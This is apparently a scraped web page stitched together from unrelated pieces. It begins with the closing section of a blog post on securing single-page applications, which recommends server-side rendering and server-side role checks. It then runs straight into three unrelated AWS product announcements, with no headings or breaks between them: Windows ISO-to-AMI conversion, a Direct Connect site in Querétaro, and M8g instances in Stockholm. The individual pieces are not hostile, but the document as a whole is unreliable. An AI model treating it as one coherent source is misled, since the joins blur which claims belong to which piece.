Aside from API access controls, another way to mitigate this issue is by using a JavaScript framework that has server-side rendering capabilities, such as Svelte-Kit, Next.js, Nuxt.js, or Gatsby. Server-side rendering is a combination of the MVC and SPA architectures. Instead of delivering all source content at once, the server renders the requested SPA page and sends only the finalized output to the user. The client browser is no longer in charge of routing, rendering, or access controls. The server can enforce access control rules before rendering the HTML, ensuring only authorized users see specific components or data.
An example of server-side rendering is shown in Figure 2.
This diagram shows a user accessing a server-side rendered application. After requesting an authenticated page in the application, the server checks if the user is authenticated and authorized to view the page. Since the user is not yet authenticated, the application renders the login page and displays that page to the user. The user then authenticates, and the server builds out the session, sets necessary cookies or tokens, and then redirects the user to the application dashboard. Upon being redirected, the user makes a request, the server checks the authentication state, and since the user has permissions to access the page, it fetches the necessary data and renders the dashboard with the data.
Next, the user identifies an admin page URL and attempts to access it. In this instance, the application checks the authentication state and the user’s role. Since the user does not have the admin role, they are not allowed to view the page and the server responds with either a 403 Forbidden or a redirection to an error page.
A Final Word
In conclusion, SPAs offer a dynamic and engaging user experience, but they also introduce unique security challenges when implemented with client-side rendering. By understanding the vulnerabilities inherent in SPAs, such as routing manipulation, hidden element exposure, and JavaScript debugging, developers can take proactive steps to mitigate risks. Implementing robust server-side access controls, API security measures, and server-side rendering are excellent ways to safeguard SPAs against unauthorized access and data breaches. Regular penetration testing and security assessments can further strengthen the overall security posture of SPAs by identifying any security gaps present in the application and allowing developers to remediate them before they are exploited. By prioritizing security best practices, developers can ensure that SPAs deliver both a seamless user experience and a secure environment for sensitive data.
Amazon EC2 Image Builder now supports direct conversion of Microsoft Windows ISO files to Amazon Machine Images (AMIs), streamlining the process of using your own Windows AMIs. This also simplifies the process of leveraging your existing Windows licenses (BYOL) with Amazon WorkSpaces.
The existing process for converting Windows ISO files into AMIs involves time-consuming manual steps and familiarity with multiple tools, increasing operational overhead. EC2 Image Builder now enables you to seamlessly import your Windows ISO files. This enhancement simplifies the workflow for Windows 11 ISO to AMI conversion and reduces time and complexity in creating custom Windows AMIs. These AMIs can be used to launch EC2 instances and can be easily imported to Amazon WorkSpaces.
This capability is present in all commercial AWS Regions. You can use this functionality using the AWS CLI, SDKs, or Console. For more information on how to use this feature, please refer to documentation.
Today, AWS announced the opening of a new AWS Direct Connect location within the Equinix MX1, Querétaro, Mexico data center near Mexico City. By connecting your network to AWS at the new location, you gain private, direct access to all public AWS Regions (except those in China), AWS GovCloud Regions, and AWS Local Zones. This site is the second AWS Direct Connect location within Mexico. The new Direct Connect location offers dedicated 10 Gbps and 100 Gbps connections with MACsec encryption available.
AWS also announced the addition of 10Gbps and 100Gbps MACsec services in the existing KIO Networks data center in Querétaro, Mexico.
The Direct Connect service enables you to establish a private, physical network connection between AWS and your data center, office, or colocation environment. These private connections can provide a more consistent network experience than those made over the public internet.
For more information on the over 145 Direct Connect locations worldwide, visit the locations section of the Direct Connect product detail pages. Or, visit our getting started page to learn more about how to purchase and deploy Direct Connect.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) M8g instances are available in AWS Europe (Stockholm) region. These instances are powered by AWS Graviton4 processors and deliver up to 30% better performance compared to AWS Graviton3-based instances. Amazon EC2 M8g instances are built for general-purpose workloads, such as application servers, microservices, gaming servers, midsize data stores, and caching fleets. These instances are built on the AWS Nitro System, which offloads CPU virtualization, storage, and networking functions to dedicated hardware and software to enhance the performance and security of your workloads.
AWS Graviton4-based Amazon EC2 instances deliver the best performance and energy efficiency for a broad range of workloads running on Amazon EC2. These instances offer larger instance sizes with up to 3x more vCPUs and memory compared to Graviton3-based Amazon M7g instances. AWS Graviton4 processors are up to 40% faster for databases, 30% faster for web applications, and 45% faster for large Java applications than AWS Graviton3 processors. M8g instances are available in 12 different instance sizes, including two bare metal sizes. They offer up to 50 Gbps enhanced networking bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS).